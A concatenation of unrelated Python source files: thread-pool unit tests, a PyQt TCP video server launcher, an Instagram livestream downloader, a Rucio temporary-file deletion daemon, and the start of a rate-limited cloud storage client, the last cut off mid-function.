pool.add_task_with_channel(channel, 0, throw, OSError())
exc_traceback = ''
try:
next(channel)
except OSError:
exc_traceback = traceback.format_exc()
self.assertIn('function_with_some_unusual_name', exc_traceback)
def test_max_value(self):
self.assertEqual(16, threading_utils.IOAutoRetryThreadPool.MAX_WORKERS)
class FakeProgress:
@staticmethod
def print_update():
pass
class WorkerPoolTest(unittest.TestCase):
def test_normal(self):
mapper = lambda value: -value
progress = FakeProgress()
with threading_utils.ThreadPoolWithProgress(progress, 8, 8, 0) as pool:
for i in range(32):
pool.add_task(0, mapper, i)
results = pool.join()
self.assertCountEqual(range(-31, 1), results)
def test_exception(self):
class FearsomeException(Exception):
pass
def mapper(value):
raise FearsomeException(value)
task_added = False
try:
progress = FakeProgress()
with threading_utils.ThreadPoolWithProgress(progress, 8, 8, 0) as pool:
pool.add_task(0, mapper, 0)
task_added = True
pool.join()
self.fail()
except FearsomeException:
self.assertEqual(True, task_added)
class TaskChannelTest(unittest.TestCase):
def test_generator(self):
channel = threading_utils.TaskChannel()
channel.send_result(1)
channel.send_result(2)
channel.send_done()
channel.send_done()
channel.send_result(3)
channel.send_done()
actual = list(channel)
self.assertEqual([1, 2], actual)
actual = list(channel)
self.assertEqual([], actual)
actual = list(channel)
self.assertEqual([3], actual)
def test_passes_simple_value(self):
with threading_utils.ThreadPool(1, 1, 0) as tp:
channel = threading_utils.TaskChannel()
tp.add_task(0, lambda: channel.send_result(0))
self.assertEqual(0, next(channel))
def test_passes_exception_value(self):
with threading_utils.ThreadPool(1, 1, 0) as tp:
channel = threading_utils.TaskChannel()
tp.add_task(0, lambda: channel.send_result(Exception()))
self.assertTrue(isinstance(next(channel), Exception))
def test_wrap_task_passes_simple_value(self):
with threading_utils.ThreadPool(1, 1, 0) as tp:
channel = threading_utils.TaskChannel()
tp.add_task(0, channel.wrap_task(lambda: 0))
self.assertEqual(0, next(channel))
def test_wrap_task_passes_exception_value(self):
with threading_utils.ThreadPool(1, 1, 0) as tp:
channel = threading_utils.TaskChannel()
tp.add_task(0, channel.wrap_task(Exception))
self.assertTrue(isinstance(next(channel), Exception))
def test_send_exception_raises_exception(self):
class CustomError(Exception):
pass
with threading_utils.ThreadPool(1, 1, 0) as tp:
channel = threading_utils.TaskChannel()
exc_info = (CustomError, CustomError(), None)
tp.add_task(0, lambda: channel.send_exception(exc_info))
with self.assertRaises(CustomError):
next(channel)
def test_wrap_task_raises_exception(self):
class CustomError(Exception):
pass
with threading_utils.ThreadPool(1, 1, 0) as tp:
channel = threading_utils.TaskChannel()
def task_func():
raise CustomError()
tp.add_task(0, channel.wrap_task(task_func))
with self.assertRaises(CustomError):
next(channel)
def test_wrap_task_exception_captures_stack_trace(self):
class CustomError(Exception):
pass
with threading_utils.ThreadPool(1, 1, 0) as tp:
channel = threading_utils.TaskChannel()
def task_func():
def function_with_some_unusual_name():
raise CustomError()
function_with_some_unusual_name()
tp.add_task(0, channel.wrap_task(task_func))
exc_traceback = ''
try:
next(channel)
except CustomError:
exc_traceback = traceback.format_exc()
self.assertIn('function_with_some_unusual_name', exc_traceback)
def test_next_timeout(self):
with threading_utils.ThreadPool(1, 1, 0) as tp:
channel = threading_utils.TaskChannel()
def task_func():
# This test ultimately relies on the condition variable primitive
# provided by pthreads. There's no easy way to mock time for it.
# Increase this duration if the test is flaky.
time.sleep(0.2)
return 123
tp.add_task(0, channel.wrap_task(task_func))
with self.assertRaises(threading_utils.TaskChannel.Timeout):
channel.next(timeout=0.001)
self.assertEqual(123, next(channel))
def test_timeout_exception_from_task(self):
with threading_utils.ThreadPool(1, 1, 0) as tp:
channel = threading_utils.TaskChannel()
def task_func():
raise threading_utils.TaskChannel.Timeout()
tp.add_task(0, channel.wrap_task(task_func))
# 'Timeout' raised by task gets transformed into 'RuntimeError'.
with self.assertRaises(RuntimeError):
next(channel)
if __name__ == '__main__':
test_env.main()
|
main.py
|
# -*- coding: utf-8 -*-
import sys,getopt
from ui_server import Ui_server
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from Server import *
class MyWindow(QMainWindow,Ui_server):
def __init__(self):
self.user_ui=True
self.start_tcp=False
self.server=Server()
self.parseOpt()
if self.user_ui:
self.app = QApplication(sys.argv)
super(MyWindow,self).__init__()
self.setupUi(self)
self.pushButton_On_And_Off.clicked.connect(self.on_and_off_server)
self.on_and_off_server()
if self.start_tcp:
self.server.turn_on_server()
self.server.tcp_flag=True
self.video=threading.Thread(target=self.server.transmission_video)
self.video.start()
self.instruction=threading.Thread(target=self.server.receive_instruction)
self.instruction.start()
if self.user_ui:
self.pushButton_On_And_Off.setText('Off')
self.states.setText('On')
def parseOpt(self):
self.opts,self.args = getopt.getopt(sys.argv[1:],"tn")
for o,a in self.opts:
if o in ('-t'):
print ("Open TCP")
self.start_tcp=True
elif o in ('-n'):
self.user_ui=False
def on_and_off_server(self):
if self.pushButton_On_And_Off.text() == 'On':
self.pushButton_On_And_Off.setText('Off')
self.states.setText('On')
self.server.turn_on_server()
self.server.tcp_flag=True
self.video=threading.Thread(target=self.server.transmission_video)
self.video.start()
self.instruction=threading.Thread(target=self.server.receive_instruction)
self.instruction.start()
else:
self.pushButton_On_And_Off.setText('On')
self.states.setText('Off')
self.server.tcp_flag=False
try:
stop_thread(self.video)
stop_thread(self.instruction)
except Exception as e:
print(e)
self.server.turn_off_server()
print("close")
def closeEvent(self,event):
try:
stop_thread(self.video)
stop_thread(self.instruction)
except:
pass
try:
self.server.server_socket.shutdown(2)
self.server.server_socket1.shutdown(2)
self.server.turn_off_server()
except:
pass
if self.user_ui:
QCoreApplication.instance().quit()
os._exit(0)
if __name__ == '__main__':
myshow=MyWindow()
if myshow.user_ui==True:
myshow.show();
sys.exit(myshow.app.exec_())
else:
try:
pass
except KeyboardInterrupt:
myshow.closeEvent(myshow)
|
download.py
|
#!/usr/bin/env python
import logging
import sys
import os
import time
import datetime
import argparse
import getpass
import json
import threading
import webbrowser
import shutil
import subprocess
from socket import timeout, error as SocketError
from ssl import SSLError
from string import Formatter as StringFormatter
import glob
try:
# py2
from urllib2 import URLError
from httplib import HTTPException
from ConfigParser import SafeConfigParser
except ImportError:
# py3
from urllib.error import URLError
from http.client import HTTPException
from configparser import SafeConfigParser
from instagram_private_api import (
Client, ClientError, ClientCookieExpiredError, ClientLoginRequiredError
)
from instagram_private_api_extensions.live import (
Downloader, logger as dash_logger
)
from instagram_private_api_extensions.replay import (
Downloader as ReplayDownloader, logger as replay_dash_logger
)
from .utils import (
Formatter, UserConfig, check_for_updates,
to_json, from_json, generate_safe_path
)
from .comments import CommentsDownloader
__version__ = '0.3.8'
USERNAME_ENV_KEY = 'IG_LOGIN_USERNAME'
PASSWORD_ENV_KEY = 'IG_LOGIN_PASSWORD'
logger = logging.getLogger(__file__)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = Formatter()
ch.setFormatter(formatter)
logger.addHandler(ch)
dash_logger.addHandler(ch)
replay_dash_logger.addHandler(ch)
api_logger = logging.getLogger('instagram_private_api')
api_logger.addHandler(ch)
rule_line = '-' * 80
def onlogin_callback(api, new_settings_file):
# saved auth cookies on login
cache_settings = api.settings
with open(new_settings_file, 'w') as outfile:
json.dump(cache_settings, outfile, indent=2, default=to_json)
logger.debug('Saved settings: %s' % new_settings_file)
def check_ffmpeg(binary_path):
ffmpeg_binary = binary_path or os.getenv('FFMPEG_BINARY', 'ffmpeg')
cmd = [
ffmpeg_binary, '-version']
logger.debug('Executing: "%s"' % ' '.join(cmd))
exit_code = subprocess.call(cmd)
logger.debug('Exit code: %s' % exit_code)
def is_replay(broadcast):
return broadcast['broadcast_status'] == 'post_live' or 'dash_playback_url' not in broadcast
def generate_filename_prefix(broadcast, userconfig):
if is_replay(broadcast):
broadcast_start = datetime.datetime.fromtimestamp(broadcast['published_time'])
broadcast_type = 'replay'
else:
broadcast_start = datetime.datetime.now()
broadcast_type = 'live'
format_args = {
'year': broadcast_start.strftime('%Y'),
'month': broadcast_start.strftime('%m'),
'day': broadcast_start.strftime('%d'),
'hour': broadcast_start.strftime('%H'),
'minute': broadcast_start.strftime('%M'),
'username': broadcast['broadcast_owner']['username'],
'broadcastid': broadcast['id'],
'broadcasttype': broadcast_type,
}
user_format_keys = StringFormatter().parse(userconfig.filenameformat)
invalid_user_format_keys = [
i[1] for i in user_format_keys if i[1] not in format_args.keys()]
if invalid_user_format_keys:
logger.error(
'Invalid filename format parameters: %s'
% ', '.join(invalid_user_format_keys))
exit(10)
filename_prefix = userconfig.filenameformat.format(**format_args)
return filename_prefix
def run():
description = ('INSTAGRAM LIVESTREAM DOWNLOADER (v%s) [python=%s.%s.%s,%s]'
% (__version__,
sys.version_info.major, sys.version_info.minor, sys.version_info.micro,
sys.platform))
config_section = 'livestream_dl'
cfgparser = None
if os.path.exists('livestream_dl.cfg'):
# read config path
cfgparser = SafeConfigParser()
cfgparser.read('livestream_dl.cfg')
parser = argparse.ArgumentParser(
description=description,
epilog='Release: v%s / %s / %s' % (__version__, sys.platform, sys.version))
parser.add_argument('instagram_user', nargs='?')
parser.add_argument('-settings', dest='settings', type=str,
help='File path to save settings.json')
parser.add_argument('-username', '-u', dest='username', type=str,
help='Login user name. Required if %s env var not set.'
% USERNAME_ENV_KEY)
parser.add_argument('-password', '-p', dest='password', type=str, required=False,
help='Login password. Can be set via %s env var.'
% PASSWORD_ENV_KEY)
parser.add_argument('-outputdir', '-o', dest='outputdir',
help='Output folder path.')
parser.add_argument('-commenters', metavar='COMMENTER_ID', dest='commenters', nargs='*',
help='List of numeric IG user IDs to collect comments from.')
parser.add_argument('-collectcomments', action='store_true',
help='Collect comments from verified users.')
parser.add_argument('-nocleanup', action='store_true',
help='Do not clean up temporary downloaded/generated files.')
parser.add_argument('-openwhendone', action='store_true',
help='Automatically open movie file when completed.')
parser.add_argument('-mpdtimeout', dest='mpdtimeout', type=int,
help='Set timeout interval in seconds for mpd download. Default %d.'
% Downloader.MPD_DOWNLOAD_TIMEOUT)
parser.add_argument('-downloadtimeout', dest='downloadtimeout', type=int,
help='Set timeout interval in seconds for segments download. Default %d.'
% Downloader.DOWNLOAD_TIMEOUT)
parser.add_argument('-ffmpegbinary', dest='ffmpegbinary', type=str,
help='Custom path to ffmpeg binary.')
parser.add_argument('-skipffmpeg', dest='skipffmpeg', action='store_true',
help='Don\'t assemble file with ffmpeg.')
parser.add_argument('-verbose', dest='verbose', action='store_true',
help='Enable verbose debug messages.')
parser.add_argument('-log', dest='log',
help='Log to file specified.')
parser.add_argument('-filenameformat', dest='filenameformat', type=str,
help='Custom filename format.')
parser.add_argument('-noreplay', dest='noreplay', action='store_true',
help='Do not download replay streams.')
parser.add_argument('-ignoreconfig', dest='ignoreconfig', action='store_true',
help='Ignore the livestream_dl.cfg file.')
parser.add_argument('-version', dest='version_check', action='store_true',
help='Show current version and check for new updates.')
argparser = parser.parse_args()
# if not a version check or downloading for a selected user
if not (argparser.instagram_user or argparser.version_check):
parser.parse_args(['-h'])
exit()
if argparser.ignoreconfig:
cfgparser = None
logger.debug('Ignoring config file.')
default_config = {
'outputdir': 'downloaded',
'commenters': [],
'collectcomments': False,
'nocleanup': False,
'openwhendone': False,
'mpdtimeout': Downloader.MPD_DOWNLOAD_TIMEOUT,
'downloadtimeout': Downloader.DOWNLOAD_TIMEOUT,
'verbose': False,
'skipffmpeg': False,
'ffmpegbinary': None,
'filenameformat': '{year}{month}{day}_{username}_{broadcastid}_{broadcasttype}',
}
userconfig = UserConfig(
config_section, defaults=default_config,
argparser=argparser, configparser=cfgparser)
if userconfig.verbose:
logger.setLevel(logging.DEBUG)
api_logger.setLevel(logging.DEBUG)
dash_logger.setLevel(logging.DEBUG)
replay_dash_logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
dash_logger.setLevel(logging.INFO)
replay_dash_logger.setLevel(logging.INFO)
if userconfig.log:
file_handler = logging.FileHandler(userconfig.log)
file_handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s: %(message)s'))
logger.addHandler(file_handler)
dash_logger.addHandler(file_handler)
replay_dash_logger.addHandler(file_handler)
api_logger.addHandler(file_handler)
logger.info(description)
if userconfig.verbose:
check_ffmpeg(userconfig.ffmpegbinary)
if argparser.version_check:
message = check_for_updates(__version__)
if message:
logger.warning(message)
else:
logger.info('[i] No new version found.')
logger.info('=-' * 40)
if not argparser.instagram_user:
exit()
user_username = userconfig.username or os.getenv(USERNAME_ENV_KEY)
if not user_username:
logger.error('No login username specified.')
exit(9)
user_password = (userconfig.password or os.getenv(PASSWORD_ENV_KEY) or
getpass.getpass(
prompt='Type in the password for %s and press "Enter" '
'\n(Your password will not show on screen): '
% user_username))
settings_file_path = userconfig.settings or ('%s.json' % user_username)
# don't use default device profile
custom_device = {
'phone_manufacturer': 'samsung',
'phone_model': 'hero2lte',
'phone_device': 'SM-G935F',
'android_release': '6.0.1',
'android_version': 23,
'phone_dpi': '640dpi',
'phone_resolution': '1440x2560',
'phone_chipset': 'samsungexynos8890'
}
api = None
try:
if not os.path.isfile(settings_file_path):
# login afresh
api = Client(
user_username, user_password,
on_login=lambda x: onlogin_callback(x, settings_file_path),
**custom_device)
else:
# reuse cached auth
with open(settings_file_path) as file_data:
cached_settings = json.load(file_data, object_hook=from_json)
# always use latest app ver, sig key, etc from lib
for key in ('app_version', 'signature_key', 'key_version', 'ig_capabilities'):
cached_settings.pop(key, None)
api = Client(
user_username, user_password,
settings=cached_settings,
**custom_device)
except (ClientCookieExpiredError, ClientLoginRequiredError) as e:
logger.warning('ClientCookieExpiredError/ClientLoginRequiredError: %s' % e)
api = Client(
user_username, user_password,
on_login=lambda x: onlogin_callback(x, settings_file_path),
**custom_device)
except ClientError as e:
logger.error('ClientError %s (Code: %d, Response: %s)' % (e.msg, e.code, e.error_response))
exit(9)
except Exception as e:
logger.error('Unexpected Exception: %s' % e)
exit(99)
if not api:
logger.error('Unable to init api client')
exit(99)
if user_username != api.authenticated_user_name:
logger.warning(
'Authenticated username mismatch: %s vs %s'
% (user_username, api.authenticated_user_name))
retry_attempts = 2
res = {}
ig_user_id = ''
for i in range(1, 1 + retry_attempts):
try:
# Alow user to save an api call if they directly specify the IG numeric user ID
if argparser.instagram_user.isdigit():
# is a numeric IG user ID
ig_user_id = argparser.instagram_user
else:
# regular ig user name
user_res = api.username_info(argparser.instagram_user)
ig_user_id = user_res['user']['pk']
res = api.user_story_feed(ig_user_id)
break
except ClientLoginRequiredError as e:
if i < retry_attempts:
# Probably because user has changed password somewhere else
logger.warning('ClientLoginRequiredError. Logging in again...')
api = Client(
user_username, user_password,
on_login=lambda x: onlogin_callback(x, settings_file_path),
**custom_device)
else:
raise e
except (SSLError, timeout, URLError, HTTPException, SocketError) as e:
if i < retry_attempts:
logger.warning(str(e))
time.sleep(userconfig.downloadtimeout)
else:
logger.error(str(e))
exit(99)
if not res.get('broadcast') and (
userconfig.noreplay or
not res.get('post_live_item', {}).get('broadcasts')):
logger.info('No broadcast from %s' % ig_user_id)
exit(0)
if res.get('broadcast'):
broadcasts = [res['broadcast']]
else:
broadcasts = res['post_live_item']['broadcasts']
for broadcast in broadcasts:
if broadcast['broadcast_status'] not in ['active', 'post_live']:
# Usually because it's interrupted
logger.warning('Broadcast status is currently: %s' % broadcast['broadcast_status'])
# check if output dir exists, create if otherwise
if not os.path.exists(userconfig.outputdir):
os.makedirs(userconfig.outputdir)
is_replay_broadcast = is_replay(broadcast)
download_start_time = int(time.time())
filename_prefix = generate_filename_prefix(broadcast, userconfig)
# dash_abr_playback_url has the higher def stream
mpd_url = (broadcast.get('dash_manifest')
or broadcast.get('dash_abr_playback_url')
or broadcast['dash_playback_url'])
# Print broadcast info to console
logger.info(rule_line)
started_mins, started_secs = divmod((int(time.time()) - broadcast['published_time']), 60)
logger.info('Broadcast by: %s \t(%s)\tType: %s' % (
broadcast['broadcast_owner']['username'],
broadcast['id'],
'Live' if not is_replay_broadcast else 'Replay')
)
if not is_replay_broadcast:
started_label = '%dm' % started_mins
if started_secs:
started_label += ' %ds' % started_secs
logger.info(
'Viewers: %d \t\tStarted: %s ago' % (
broadcast.get('viewer_count', 0),
started_label)
)
logger.info('Dash URL: %s' % mpd_url)
logger.info(rule_line)
# Record the delay = duration of the stream that has been missed
broadcast['delay'] = ((download_start_time - broadcast['published_time'])
if not is_replay_broadcast else 0)
# folder path for downloaded segments
mpd_output_dir = generate_safe_path(
'%s_downloads' % filename_prefix, userconfig.outputdir, is_file=False)
# file path to save the stream's info
meta_json_file = generate_safe_path('%s.json' % filename_prefix, userconfig.outputdir)
# file path to save collected comments
comments_json_file = generate_safe_path('%s_comments.json' % filename_prefix, userconfig.outputdir)
if is_replay_broadcast:
# ------------- REPLAY broadcast -------------
dl = ReplayDownloader(mpd=mpd_url, output_dir=mpd_output_dir, user_agent=api.user_agent)
duration = dl.duration
broadcast['duration'] = duration
if duration:
duration_mins, duration_secs = divmod(duration, 60)
if started_mins < 60:
started_label = '%dm %ds' % (started_mins, started_secs)
else:
started_label = '%dh %dm' % divmod(started_mins, 60)
logger.info(
'Duration: %dm %ds \t\tStarted: %s ago' % (
duration_mins, duration_secs, started_label)
)
logger.info(rule_line)
# Detect if this replay has already been downloaded
if glob.glob(os.path.join(userconfig.outputdir, '%s.*' % filename_prefix)):
# Already downloaded, so skip
logger.warning('This broadcast is already downloaded.')
# Remove created empty folder
if os.path.isdir(mpd_output_dir):
os.rmdir(mpd_output_dir)
continue
# Good to go
logger.info('Downloading into %s ...' % mpd_output_dir)
logger.info('[i] To interrupt the download, press CTRL+C')
final_output = generate_safe_path('%s.mp4' % filename_prefix, userconfig.outputdir)
try:
generated_files = dl.download(
final_output, skipffmpeg=userconfig.skipffmpeg,
cleartempfiles=(not userconfig.nocleanup))
# Save meta file later after a successful download
# so that we don't trip up the downloaded check
with open(meta_json_file, 'w') as outfile:
json.dump(broadcast, outfile, indent=2)
logger.info(rule_line)
if not userconfig.skipffmpeg:
logger.info('Generated file(s): \n%s' % '\n'.join(generated_files))
else:
logger.info('Skipped generating file.')
logger.info(rule_line)
if userconfig.commenters or userconfig.collectcomments:
logger.info('Collecting comments...')
cdl = CommentsDownloader(
api=api, broadcast=broadcast, destination_file=comments_json_file,
user_config=userconfig, logger=logger)
cdl.get_replay()
# Generate srt from comments collected
if cdl.comments:
logger.info('Generating comments file...')
srt_filename = final_output.replace('.mp4', '.srt')
CommentsDownloader.generate_srt(
cdl.comments, broadcast['published_time'], srt_filename,
comments_delay=0)
logger.info('Comments written to: %s' % srt_filename)
logger.info(rule_line)
except KeyboardInterrupt:
logger.info('Download interrupted')
except Exception as e:
logger.error('Unexpected Error: %s' % str(e))
continue # Done with all replay processing
# ------------- LIVE broadcast -------------
with open(meta_json_file, 'w') as outfile:
json.dump(broadcast, outfile, indent=2)
job_aborted = False
# Callback func used by downloaded to check if broadcast is still alive
def check_status():
heartbeat_info = api.broadcast_heartbeat_and_viewercount(broadcast['id'])
logger.info('Broadcast Status Check: %s' % heartbeat_info['broadcast_status'])
return heartbeat_info['broadcast_status'] not in ['active', 'interrupted']
dl = Downloader(
mpd=mpd_url,
output_dir=mpd_output_dir,
callback_check=check_status,
user_agent=api.user_agent,
mpd_download_timeout=userconfig.mpdtimeout,
download_timeout=userconfig.downloadtimeout,
duplicate_etag_retry=60,
ffmpegbinary=userconfig.ffmpegbinary)
# Generate the final output filename so that we can
final_output = generate_safe_path('%s.mp4' % filename_prefix, userconfig.outputdir)
# Call the api to collect comments for the stream
def get_comments():
logger.info('Collecting comments...')
cdl = CommentsDownloader(
api=api, broadcast=broadcast, destination_file=comments_json_file,
user_config=userconfig, logger=logger)
first_comment_created_at = 0
try:
while not job_aborted:
# Set initial_buffered_duration as soon as it's available
if 'initial_buffered_duration' not in broadcast and dl.initial_buffered_duration:
broadcast['initial_buffered_duration'] = dl.initial_buffered_duration
cdl.broadcast = broadcast
first_comment_created_at = cdl.get_live(first_comment_created_at)
except ClientError as e:
if 'media has been deleted' in e.error_response:
logger.info('Stream end detected.')
else:
logger.error('Comment collection ClientError: %d %s' % (e.code, e.error_response))
logger.info('%d comments collected' % len(cdl.comments))
# do final save just in case
if cdl.comments:
cdl.save()
# Generate srt from comments collected
srt_filename = final_output.replace('.mp4', '.srt')
CommentsDownloader.generate_srt(
cdl.comments, download_start_time, srt_filename,
comments_delay=dl.initial_buffered_duration)
logger.info('Comments written to: %s' % srt_filename)
# Put comments collection into its own thread to run concurrently
comment_thread_worker = None
if userconfig.commenters or userconfig.collectcomments:
comment_thread_worker = threading.Thread(target=get_comments)
comment_thread_worker.start()
logger.info('Downloading into %s ...' % mpd_output_dir)
logger.info('[i] To interrupt the download, press CTRL+C')
try:
dl.run()
except KeyboardInterrupt:
logger.warning('Download interrupted.')
# Wait for download threads to complete
if not dl.is_aborted:
dl.stop()
finally:
job_aborted = True
# Record the initial_buffered_duration
broadcast['initial_buffered_duration'] = dl.initial_buffered_duration
broadcast['segments'] = dl.segment_meta
with open(meta_json_file, 'w') as outfile:
json.dump(broadcast, outfile, indent=2)
missing = broadcast['delay'] - int(dl.initial_buffered_duration)
logger.info('Recorded stream is missing %d seconds' % missing)
# Wait for comments thread to complete
if comment_thread_worker and comment_thread_worker.is_alive():
logger.info('Stopping comments download...')
comment_thread_worker.join()
logger.info('Assembling files....')
generated_files = dl.stitch(
final_output, skipffmpeg=userconfig.skipffmpeg,
cleartempfiles=(not userconfig.nocleanup))
logger.info(rule_line)
if not userconfig.skipffmpeg:
logger.info('Generated file(s): \n%s' % '\n'.join(generated_files))
else:
logger.info('Skipped generating file.')
logger.info(rule_line)
if not userconfig.skipffmpeg and not userconfig.nocleanup:
shutil.rmtree(mpd_output_dir, ignore_errors=True)
if userconfig.openwhendone and os.path.exists(final_output):
webbrowser.open_new_tab('file://' + os.path.abspath(final_output))
|
light_reaper.py
|
# Copyright 2016-2018 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Vincent Garonne <vgaronne@gmail.com>, 2016-2018
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Andrew Lister <andrew.lister@stfc.ac.uk>, 2019
# - Thomas Beermann <thomas.beermann@cern.ch>, 2019
#
# PY3K COMPATIBLE
'''
Light Reaper is a daemon to manage temporary object/file deletion.
'''
import hashlib
import logging
import os
import random
import socket
import sys
import threading
import time
import traceback
from rucio.common.config import config_get
from rucio.common.exception import (SourceNotFound, DatabaseException, ServiceUnavailable,
RSEAccessDenied, ResourceTemporaryUnavailable)
from rucio.core import rse as rse_core
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.message import add_message
from rucio.core.temporary_did import (list_expired_temporary_dids, delete_temporary_dids)
from rucio.rse import rsemanager as rsemgr
logging.getLogger("requests").setLevel(logging.CRITICAL)
logging.basicConfig(stream=sys.stdout,
level=getattr(logging,
config_get('common', 'loglevel',
raise_exception=False,
default='DEBUG').upper()),
format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
GRACEFUL_STOP = threading.Event()
def reaper(rses=[], worker_number=1, total_workers=1, chunk_size=100, once=False, scheme=None):
"""
Main loop to select and delete files.
:param rses: List of RSEs the reaper should work against. If empty, it considers all RSEs.
:param worker_number: The worker number.
:param total_workers: The total number of workers.
:param chunk_size: the size of chunk for deletion.
:param once: If True, only runs one iteration of the main loop.
:param scheme: Force the reaper to use a particular protocol, e.g., mock.
"""
logging.info('Starting Light Reaper %s-%s: Will work on RSEs: %s', worker_number, total_workers, str(rses))
pid = os.getpid()
thread = threading.current_thread()
hostname = socket.gethostname()
executable = ' '.join(sys.argv)
hash_executable = hashlib.sha256(sys.argv[0] + ''.join(rses)).hexdigest()
sanity_check(executable=None, hostname=hostname)
while not GRACEFUL_STOP.is_set():
try:
# heartbeat
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
logging.info('Light Reaper({0[worker_number]}/{0[total_workers]}): Live gives {0[heartbeat]}'.format(locals()))
nothing_to_do = True
random.shuffle(rses)
for rse_id in rses:
replicas = list_expired_temporary_dids(rse_id=rse_id,
limit=chunk_size, worker_number=worker_number,
total_workers=total_workers)
rse = rse_core.get_rse_name(rse_id=rse_id)
rse_info = rsemgr.get_rse_info(rse_id=rse_id)
rse_protocol = rse_core.get_rse_protocols(rse_id=rse_id)
prot = rsemgr.create_protocol(rse_info, 'delete', scheme=scheme)
deleted_replicas = []
try:
prot.connect()
for replica in replicas:
nothing_to_do = False
try:
# pfn = str(rsemgr.lfns2pfns(rse_settings=rse_info,
# lfns=[{'scope': replica['scope'].external, 'name': replica['name'], 'path': replica['path']}],
# operation='delete', scheme=scheme).values()[0])
pfn = 's3://%s%s%s' % (prot.attributes['hostname'], prot.attributes['prefix'], replica['name'])
# logging.debug('Light Reaper %s-%s: Deletion ATTEMPT of %s:%s as %s on %s', worker_number, total_workers, replica['scope'], replica['name'], pfn, rse)
start = time.time()
prot.delete(pfn)
duration = time.time() - start
logging.info('Light Reaper %s-%s: Deletion SUCCESS of %s:%s as %s on %s in %s seconds', worker_number, total_workers, replica['scope'], replica['name'], pfn, rse, duration)
add_message('deletion-done', {'scope': replica['scope'].external,
'name': replica['name'],
'rse': rse,
'rse_id': rse_id,
'file-size': replica.get('bytes') or 0,
'bytes': replica.get('bytes') or 0,
'url': pfn,
'duration': duration,
'protocol': prot.attributes['scheme']})
deleted_replicas.append(replica)
except SourceNotFound:
err_msg = 'Light Reaper %s-%s: Deletion NOTFOUND of %s:%s as %s on %s' % (worker_number, total_workers, replica['scope'], replica['name'], pfn, rse)
logging.warning(err_msg)
deleted_replicas.append(replica)
except (ServiceUnavailable, RSEAccessDenied, ResourceTemporaryUnavailable) as error:
err_msg = 'Light Reaper %s-%s: Deletion NOACCESS of %s:%s as %s on %s: %s' % (worker_number, total_workers, replica['scope'], replica['name'], pfn, rse, str(error))
logging.warning(err_msg)
add_message('deletion-failed', {'scope': replica['scope'].external,
'name': replica['name'],
'rse': rse,
'rse_id': rse_id,
'file-size': replica['bytes'] or 0,
'bytes': replica['bytes'] or 0,
'url': pfn,
'reason': str(error),
'protocol': prot.attributes['scheme']})
except:
logging.critical(traceback.format_exc())
finally:
prot.close()
delete_temporary_dids(dids=deleted_replicas)
if once:
break
if once:
break
if nothing_to_do:
logging.info('Light Reaper %s-%s: Nothing to do. I will sleep for 60s', worker_number, total_workers)
time.sleep(60)
except DatabaseException as error:
logging.warning('Reaper: %s', str(error))
except:
logging.critical(traceback.format_exc())
die(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
logging.info('Graceful stop requested')
logging.info('Graceful stop done')
return
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
GRACEFUL_STOP.set()
def run(total_workers=1, chunk_size=100, once=False, rses=[], scheme=None,
exclude_rses=None, include_rses=None, delay_seconds=0, all_rses=False):
"""
Starts up the reaper threads.
:param total_workers: The total number of workers.
:param chunk_size: the size of chunk for deletion.
:param threads_per_worker: Total number of threads created by each worker.
:param once: If True, only runs one iteration of the main loop.
:param greedy: If True, delete right away replicas with tombstone.
:param rses: List of RSEs the reaper should work against. If empty, it considers all RSEs.
:param scheme: Force the reaper to use a particular protocol/scheme, e.g., mock.
:param exclude_rses: RSE expression to exclude RSEs from the Reaper.
:param include_rses: RSE expression to include RSEs.
"""
logging.info('main: starting processes')
if all_rses:
rses = [rse['id'] for rse in rse_core.list_rses()]
else:
rses = [rse_core.get_rse_id(rse=rse) for rse in rses]
threads = []
for worker in range(total_workers):
kwargs = {'worker_number': worker,
'total_workers': total_workers,
'rses': rses,
'once': once,
'chunk_size': chunk_size,
'scheme': scheme}
threads.append(threading.Thread(target=reaper, kwargs=kwargs, name='Worker: %s, Total_Workers: %s' % (worker, total_workers)))
[t.start() for t in threads]
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
|
cloudstore.py
|
import requests
import threading
import time
import json
# initiates a parallel delayed function call
def setTimeout(cb, delay, args=None, kwargs=None):
t = threading.Timer(delay, cb, args, kwargs)
t.start()
return t
class CloudStore:
# static to limit across instances
maxRate = 3 # minimum delay in seconds between requests
__tlast = 0 # last request timestamp
rateOff = 0.01 # minimum offset in seconds between requests
lock = threading.Lock() # main thread lock for synchronizing
def __init__(self, key, server="https://droidscript.cloud/cloudstore"):
self.server = server # host server url
self.m_apiKey = key # private api key
self.m_retry = True # (unused boolean) for retrying failed requests
self.m_version = 1 # library version
@classmethod
def rateCheck(self):
res = True
self.lock.acquire()
n = time.time()
if n - self.__tlast < self.maxRate: res = False
else: self.__tlast = n
self.lock.release()
return res
@classmethod
def getRemainingRate(self):
self.lock.acquire()
res = self.maxRate - (time.time() - self.__tlast)
self.lock.release()
return res
@classmethod
def sendData(self, url, json=None, cb=None, method="POST", **kwargs):
t = threading.Thread(target=self.__asyncSendData, args=[url, json, cb, method], kwargs=kwargs)
t.start()
return t
@classmethod
def __asyncSendData(self, url, data=None, cb=None, method="POST", **kwargs):
while not self.rateCheck():
time.sleep(self.getRemainingRate() + self.rateOff)
r = res = None
try:
r = requests.request(method, url, json=data, **kwargs)
if r.status_code == 200: res = r.json()
else: res = { "error": "Http error", "message": r.reason, "exception": requests.HTTPError(response=r) }
except json.JSONDecodeError as e:
